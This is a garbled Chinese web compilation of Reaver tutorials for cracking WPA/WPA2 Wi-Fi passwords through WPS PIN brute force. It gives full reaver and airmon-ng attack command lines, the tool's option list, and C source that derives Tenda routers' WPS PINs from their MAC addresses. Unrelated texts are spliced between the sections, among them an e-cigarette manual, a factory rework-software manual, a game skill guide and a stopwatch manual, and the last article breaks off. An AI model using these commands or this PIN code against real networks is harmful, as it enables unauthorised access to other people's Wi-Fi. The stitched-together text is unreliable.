reaver 使用方法和技1

使用Reaver加PIN码秒破WPA-PSK密码2012-04-27 09:53:55 我来说两句收藏我要投稿 [字体：小大]之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake 后挂字典爆破方式，而能否破解出wpa密码完全依赖于字典强度了。

除了该方式外还有一个更有效的办法，就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码！在已知PIN码的情况下可以在BT5下使用 reaver -i mon0 -b AP‘s Mac -p pin 直接秒破！现在比较难的就是怎么得到PIN的问题了，经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞，如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值，然后使用PIN值直接连接或者继续使用PIN值加reaver破解出wpa-psk。

除此之外，根据PIN特点同样也可以使用Reaver来穷举，pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。

在BT5下可以使用 reaver -i mon0 -b AP's Mac -vv 来破解，这个过程可能需要花很多个小时，在网上有看到是3-10个小时，具体的我还未验证。

reaver在此过程中还会保存进度（/usr/local/etc/reaver/AP’s MAC.wpc）到文件。

不过使用PIN方法破解WPA-PSK密码有一个限制，就是AP必须开启了QSS、WPS 功能！我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能，如下图使用airodump-ng扫描时候在MB栏中后面有个“.”的就是。

或者在win7下面，连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。

“C83A35”或“00B00C”打头路由PIN计算工具源码，大家可以自己编译：//Computes PIN code starts with OUI "C83A35" and "00B00C"//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.//Coded by Zhaochunsheng - //Modified by Lingxi - #include <stdio.h>#include <stdlib.h>#include <stdafx.h>int main(){unsigned int wps_pin_checksum(unsigned int pin);int PIN = 0;// printf("ComputePIN-C83A35\n");printf("Description:\n");printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");printf("type the other six digits, you might be able to get the \n"); printf("WPS-PIN of this equipment, please have a try, good luck!\n\n"); printf("Code by ZhaoChunsheng 04/07/2012 \n\n");printf("Modified by Lingxi - \n\n");//Translated to Chineseprintf("说明：\n");printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头，\n"); printf("输入后六位MAC地址（不分大小写）您或许可以获得该路由的WPS PIN密钥！\n");printf("祝你好运！\n\n");printf("由赵春生编写于2012年4月7日\n");printf("由灵曦修改并汉化 \n\n");printf("请输入后六位MAC地址（HEX）：\n");printf("Input the last 6 digits of MAC Address(HEX):");scanf("%x",&PIN); printf("Last 6 digits of MAC Address(HEX)are: %X\n",PIN);printf("WPS PINis: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));return 0;}unsigned int wps_pin_checksum(unsigned int pin){unsigned int accum = 0;while (pin){accum += 3 * (pin % 10);pin /= 10;accum += pin % 10;pin /= 10;}return (10 - accum % 10) % 10; }。

如何使用Reaver破解Wi-Fi网络的WPA密码Wi-Fi网络能够让我们便利地访问因特网，但同时，我们又不希望隔壁抠门猥琐男总是蹭我们的网，所以自然要给WiFi加个密码，对吧？于是，好消息是，也许你已经看过我的另一篇文章，“如何使用BackTrack破解WIFI无线网络的WEP密钥”，所以你使用了更稳固的WPA安全协议。

但坏消息是，现在有一款自由开源新工具——Reaver，已经挖掘出了无线路由器的一个漏洞，由此能够破解绝大多数路由器上的密码。

今天，我就来一步步介绍，如何使用Reaver破解WPA/WPA2密码。

最后我会给出相应的防范对策。

文章的第一部分，是使用Reaver破解WPA的详细步骤，读者可以看视频，也可以跟着下面的文字一起做。

然后，我会解释Reaver的工作原理。

最后，介绍如何防范Reaver攻击。

/embed/z1c1OIMbmb0?wmode=transparent&rel=0&autohide=1&showinfo=0&enablejs api=1在正式开始之前，我还是要不厌其烦强调一下：知识就是力量，但是拥有力量不代表着可以为所欲为、触犯法律。

同样，骑白马的不一定是王子，会开锁的也不一定是小偷。

本文只是关于某些技术的实验与验证，只适用于学习。

你知道的越多，就能够越好的保护自己。

准备工作首先，无需成为一名网络专家，学会使用复杂的命令行工具，你只需要准备一张空白DVD、一台能连接WiFi的电脑，并腾出几个小时时间，这就是我们基本需要的东西。

要安装Reaver，可以有很多方法，但是这里我们建议你按照下面的指南来做：∙The BackTrack 5 Live DVD。

BackTrack是一款支持自启动的Linux发行版，上面集成了大量的网络测试工具。

虽然这对于安装、配置Reaver并不是必需的一个条件，但是对于大多数用户却是最简单一个方法。

从BackTrack的下载页面（传送门）下载Live DVD，然后刻盘。

RELEX电子烟商务版说明书
1、烟嘴向上倾斜45度，使烟弹中烟油与雾化芯充分接触（体验感最佳）
2、请勿将烟杆倒置使用，烟油雾化不充分，易糊芯哦（禁止烟嘴向下躺着吸）
3、请勿大口快吸，电流过大易损害电器元件（对烟杆不好容易烧坏哦）
4、建议小口慢吸（每口2秒可充分雾化避免糊芯）
5、请勿长时间置放车内以及高温地方，会加大漏油概率（推荐置放于包内或随身携带，放至阴凉干燥处）
6、禁止用水冲洗，见水死哦。

（棉布擦拭即可）
7、金属物禁止接触烟杆内部。

（有电的哦）。

Reaver基本命令参数详解及应用Reaver基本命令参数XiaoPanOS下：选择“终端”输入sudo thunar这里是为了取得超级权限，选择系统文件-usr-local-ect-reaveifconfig –a //确认你用哪一个网卡WLAN0或WLAN1airmon-ng start wlan0 //开启监听模式wash –i mon0 –C //查看开启wps的无线路由器airodump-ng mon0 //查看周边AP信息（抓包）reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码reaver –i mon0 –b MAC –a –S –vv –d 0 //加快速度为1秒reaver –i mon0 –b MAC –a –S –vv –p xxxx //从前4位PIN码开始reave的进度表文件保存在:1.3版：/etc/reaver/MAC地址.wpc1.4版：/usr/local/etc/reaver/MAC地址.wpcCDliunx下：选择“终端”输入sudo thunar这里是为了取得超级权限，选择系统文件-usr-local-ect-reaver-reaver必需的参数:-i, --interface=wlan Name of the monitor-mode interface to use //监视模式接口使用的名称-b, --bssid=mac BSSID of the target AP //目标AP的SSIDreaver可选参数:-m, --mac=mac MAC of the host system //主机系统的MAC-e, --essid=ssid ESSID of the target AP //目标AP的ESSID-c, --channel=channel Set the 802.11 channel for the interface (implies -f)//设置接口的802.11信道 (意味着 -f)-o, --out-file=file Send output to a log file [stdout] //输出发送到一个日志文件-s, --session=file Restore a previous session file //恢复以前的记录文件-C, --exec=command Execute the supplied command upon successful pin recovery//所提供的命令执行成功后，pin 恢复-D, --daemonize Daemonize reaver //守护进程 reaver-a, --auto Auto detect the best advanced options for the target AP//自动检测目标AP的最先进的选项-f, --fixed Disable channel hopping //禁用信道跳频-5, --5ghz Use 5GHz 802.11 channels //使用5GHz的802.11信道-v, --verbose Display non-critical warnings (-vv for more) //显示非关键的警告（- VV更多）-q, --quiet Only display critical messages //仅显示重要消息-h, --help Show help //显示帮助reaver高级选项：-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin //使用指定的4个或8个的 pin WPS-d, --delay=seconds Set the delay between pin attempts [1] //设置pin尝试之间的延迟[1] -l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]//设置等待的时间，如果AP锁定WPS PIN尝试[60]-g, --max-attempts=num Quit after num pin attempts //退出后NUM pin尝试-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]//设定时间后进入休眠10[0]意外故障-r, --recurring-delay=xy Sleep for y seconds every x pin attempts //对每一个pin码尝试Y秒-t, --timeout=seconds Set the receive timeout period [5] //设置接收超时时间[5]-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20] //设置M5M7超时期[0.20]-A, --no-associate Do not associate with the AP (association must be done by another application)//不要与AP关联（协会必须由另一个应用程序进行）-N, --no-nacks Do not send NACK messages when out of order packets are received//不要发送NACK消息收到时，为了包出-S, --dh-small Use small DH keys to improve crack speed //使用小DH密钥，以提高PJ 速度-L, --ignore-locks Ignore locked state reported by the target AP //忽略锁定状态的目标AP-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet//终止每一个EAP失败包WPS的记录-n, --nack Target AP always sends a NACK [Auto] //目标AP发送一个NACK[自动]-w, --win7 Mimic a Windows 7 registrar [False] //模仿Windows 7的注册处处长[虚假]reaver 使用方法和技巧:reaver使用方法:reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c 频道-i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key，可以提高PJ速度-vv 显示更多的非严重警告-d 即delay每穷举一次的闲置时间预设为1秒-c 频道-p PIN码四位或八位 //可以用8位直接找到密码。

refresh的用法一、什么是Refresh功能？Refresh功能是指在互联网使用过程中，当用户需要及时更新或重新加载当前页面时所采取的一种操作。

通过点击页面上的刷新按钮或快捷键，浏览器会重新加载页面，并显示最新的内容。

二、刷新的常见方式1. 点击浏览器的刷新按钮：这是最常见和直观的一种方式，位于浏览器工具栏上，通常是一个箭头形状的图标。

用户只需点击该按钮即可进行页面刷新。

2. 使用快捷键：大多数浏览器都支持使用快捷键来进行刷新操作。

例如，在Windows操作系统中，用户可以同时按下F5键或Ctrl+R组合键；而在MacOS中，则可以按下Command+R键。

3. 右键菜单中选择“刷新”：用户也可以通过右键单击页面，在弹出的菜单中选择“刷新”选项来进行相应操作。

4. 使用地址栏内的刷新按钮：除了在工具栏上显示的刷新按钮外，大多数现代浏览器还在地址栏内提供了一个小型刷新按钮。

用户只需点击该按钮即可完成页面刷新。

三、Refresh功能的作用1. 获取最新内容：当用户访问某个网页时，有可能由于网络延迟或其他原因导致页面内容未能及时更新。

通过刷新页面，用户可以主动获取最新的内容，并过滤掉已经过时的信息。

2. 清除网页缓存：有时候用户在访问某个网页时会遇到一些显示上的问题，比如页面错位、图片无法加载等。

这可能是由于浏览器缓存的旧数据造成的。

通过刷新页面，浏览器会重新下载并解析页面中的所有资源，有效清除缓存，从而排除可能存在的问题。

3. 更新Web应用程序：对于一些基于Web技术开发的应用程序，比如在线聊天工具、邮件客户端等，经常需要实时地获取最新数据。

使用Refresh功能可以使这类应用程序及时更新数据并保持与服务器同步。

4. 修复错误：当页面出现代码错误或链接失效等问题时，使用Refresh功能可以尝试重新加载页面以修复这些错误。

如果错误是暂时性的，则通过刷新操作往往能够恢复正常状态。

四、使用Refresh功能需注意的事项1. 数据丢失风险：刷新页面将导致当前未保存的输入内容丢失。

Rework程式操作手冊（Rework.EXE）目錄1．簡介 (3)1-1．程式介紹和功能 (3)1-2．各種按鈕 (3)1-3．欄位說明 (4)2．功能說明 (4)2-1．程式開啓和許可權管控 (4)2-2．各種功能 (5)2-2-1．Rework NO Maintain 頁 (5)2-2-2．Rework Add頁 (6)2-2-3．Rework Query 頁 (6)3．操作說明 (7)3-1．重工 (7)3-2．添加Rework清單 (7)3-2-1．通過序列號添加 (7)3-2-2．通過SSN出貨序號來添加 (9)3-2-3．通過Scarton的箱號來添加 (9)3-2-4．通過QcLot來添加 (10)3-2-5．通過Pallet站板號來添加 (10)4．注意事項 (10)1．簡介圖示：程式名稱：Rework System目前版本：2.0.0.1（建立日期：2003/12/22）功能：用來作重工的程式1-1．程式介紹和功能REWORK程式是一支製造單位在重工産品時使用到的程式，它可以記錄具體的重工原因，以及更改某些産品的資料時使用，以便客戶查詢的到産品重工的各種訊息，同時使産品可以重新從重工的站點開始繼續紀錄資料。

REWORK程式主要功能就是解除在原先生産過程中LINK的一些資料，包括箱號，訂單號等等，這樣使板子的狀態變成USER所需要的狀態.REWORK使用是否正確，關係到後續産品在重工過程和包裝時資料是否對應正確，以及生産部門對重工産品在重工過程的管理。

1-2．各種按鈕點擊後顯示重工的主介面。

點擊後顯示重工添加的介面。

點擊後添加一項Rework清單點擊後移除一項Rework清單1-3．欄位說明Status 表示當前重工的狀態，有UnRework(不重工)和Rework（重工）兩種Rework Type 表示重工的類型，主要分爲兩種，REWORK BATCH（批次重工）和REWORK ONLINE（線上重工）Target 表示目標量Rework NO 表示重工號碼，在你添加某一個重工時會自動賦值Rework Kind 表示重工的種類，有以下幾種：PQA_Purge,OQC_驗退，PACK_轉包裝，TEST_重工，重工組集中重工，PD4重工改機，重工Rework Route 表示重工途徑。

瑞文ew操作方法
瑞文的E技能是一个位移技能，可以用来追敌击杀或躲避敌人的攻击。

下面是瑞文E技能的操作方法：
1.按下E键：在游戏中，按下E键即可使用瑞文的E技能。

2.选择方向：使用E技能时，需要选择方向，即选定跳跃的方向。

3.跳跃：向目标方向跳跃。

注意跳跃的距离和方向，以免跳跃失败。

4.触发被动：使用E技能可以触发瑞文的被动技能，使下一次普通攻击的伤害得到提升。

需要注意的是，瑞文的E技能有一定的冷却时间，使用时需谨慎把握时机。

同时，也需要通过实战去熟悉技能的使用，提升自己的游戏技巧。

兰威秒表说明书
1．记录一个时间：在计时器显示的情况下，按MODE键选择，即可出现秒表功能。

按一下START/STOP按钮开始自动计秒，再按一下停止计秒，显示出所计数据。

按LAP/RESET键，则自动复零。

2．记录多个时间：若要纪录多个物体同时出发，但不同时到达终点的运动，可采用多计时功能方式（具体可记录数量以表的说明书介绍为准）。

即首先在秒表状态下按START/STOP开始，秒表开始自动计秒，待物体到达终点时按一下LAP/RESET，则显示不同物体的计秒数停止，并显示在屏幕上方。

此时秒表仍在记录，内部电路仍在继续为后面的物体累积计秒。

全部物体记录完成后正常停表，按RECALL 可进入查看前面的记录情况，上下翻动可用START/STOP和LAP/RESET 两键。

3．时间、日期的调整：若需要进行时刻和日期的校正与调整，可按MODE键，待显示时、分、秒的计秒数字时，按住RECALL键2秒后见数字闪烁即可选择调整，直到显示出所需要调整的正确秒数时为止，再按下RECALL键。

路由器的RESET是什么意思有什么用通常在路由器旁边有这么一个RESET按键，这个RESET按键是干什么的?RESET是什么意思?顾名思义是重置功能，那么具体重置代表什么呢?那下面小编就来告诉你路由器的RESET是什么意思。

有什么用。

路由器的RESET是什么意思?RESET的意思就是复位、重置的意思(恢复出厂设置)，用户将此键长按8秒左右，直至所有面板指示灯一起闪烁，表示复位成功，此时路由器的参数配置清零，恢复成出厂状态，用户可以进行重新配置参数了。

复位之后，路由器账号密码都会回到出厂状态，按照路由器背面写的初始账号密码登录就行了。

以上也就是路由器的RESET是什么意思。

有什么用的全部内容了，如果你不知道这个是什么意思的可以看看就知道是什么意思了。

很多MP3、路由器等等设备上都有这个按钮，在设备出现问题时候可以按住RESET按键，使用起来非常方便，大家可以试试看!补充：路由器提速技巧重启重启后的路由器由于释放了系统资源，效率最优化，运行速度更快。

我们重启路由器方式并不多，通过管理IP输入用户名和密码进入后台管理界面，然后点击重启路由，还有就是强拔电源，我们并不建议这种野蛮操作。

一键重启功就像摁开关一样简单。

扩大信号WIFI信号会随着距离长短渐渐衰弱，有时候就是一堵墙的距离，你在这头它却在那头就是不能愉快玩耍，不管你是乡下的小洋楼还是城里的大HOUSE，加装个路由器简单又实惠。

360度无死用全覆盖。

只需两步轻松实现。

干掉蹭网的火热的蹭网软件，占用你的路由、你的网络、你的资源。

而这一切就在不知不觉中进行。

潜伏着的敌人，我要代表月亮消灭你。

相关阅读：路由器常见问题原因分析1、验证电缆是否安全连接这可能听起来像一个没有脑子，但大部分用户们有时忘记检查最明显的解决方案，然后再转到更复杂的解决方案。

有人可能意外地拉扯或踢了一根电缆，导致电缆拔掉或松动。

所以应检查所有涉及的电缆，并确保它们已牢固连接。

2、检查过热像任何其他电子设备一样，路由器可能会成为过热的牺牲品。

不用python破解wifi密码的方法（实用版2篇）篇1 目录1.介绍2.破解 WiFi 密码的合法性3.破解 WiFi 密码的方法4.总结篇1正文1.介绍在当今社会，WiFi 已经成为人们日常生活中必不可少的一部分。

很多时候，我们会遇到需要破解 WiFi 密码的情况，但是作为一个合法的公民，我们应该遵守相关法律法规，不去侵犯他人的隐私。

因此，本篇文章将为大家介绍一些不用 Python 破解 WiFi 密码的方法。

2.破解 WiFi 密码的合法性在我国，未经授权擅自破解他人的 WiFi 密码属于侵犯他人隐私的行为，是不合法的。

因此，我们在日常生活中应该尽量避免去破解 WiFi 密码，尊重他人的隐私权。

3.破解 WiFi 密码的方法虽然我们不鼓励破解 WiFi 密码，但是在某些特殊情况下，例如 WiFi 主人同意或者在公共场合等，我们可以使用一些方法来获取 WiFi 密码。

这里我们将介绍一些不用 Python 的方法。

（1）手动猜测：这是一种最简单的方法，通过尝试常见的密码组合来破解 WiFi 密码。

但是这种方法效率较低，成功率也不高。

（2）使用 WiFi 万能钥匙：WiFi 万能钥匙是一款可以自动获取周边WiFi 密码的软件，但是需要注意的是，使用该软件需要在合法的范围内，即 WiFi 主人同意或者在公共场合等。

（3）利用漏洞：有些 WiFi 路由器存在一些安全漏洞，我们可以通过利用这些漏洞来获取 WiFi 密码。

但是这种方法需要一定的技术水平，并且随着路由器厂商的不断更新，这种方法的可行性也在降低。

4.总结总的来说，虽然我们可以通过一些方法来破解 WiFi 密码，但是在日常生活中，我们应该遵守相关法律法规，不去侵犯他人的隐私权。

篇2 目录1.引言：介绍 WiFi 密码破解的背景和需求2.方法一：使用 Wireshark 工具3.方法二：使用 Aircrack-ng 工具4.方法三：使用 Reaver 工具5.方法四：使用 Kismet 工具6.总结：对不用 Python 破解 WiFi 密码的方法进行总结篇2正文在当今信息化时代，WiFi 已成为人们日常生活中不可或缺的一部分。